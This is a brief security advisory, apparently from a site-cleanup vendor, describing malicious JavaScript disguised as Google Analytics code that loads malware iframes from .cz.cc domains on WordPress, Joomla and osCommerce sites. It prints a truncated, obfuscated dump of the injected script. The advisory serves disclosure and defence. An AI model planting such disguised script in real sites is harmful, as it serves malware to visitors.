Description: Malicious javascript desguised as a Google analytics tracking code, and used to load malware (iframes) from multiple .cz.cc domains (specially from trip11209.cz.cc):
Affecting: Any web site (common on WordPress, Joomla and osCommerce).
Clean up: Our team can clean up it for you: http://sucuri.net/signup/
Malware dump:
<script snc="http://www.google-analytics.com/urchin.js" id="googleanalytics"..
var emob = googleanalytics;var emsk = 126853 * 4;var emsp = googleanalytics.id.substr(1,0);var k ..
emob.innerHTML.split(emsk.toString())[1].split(emsp);for(var v in t) { if(v%2 == 0) {var c = parseInt(t[v++]+t[v],8+...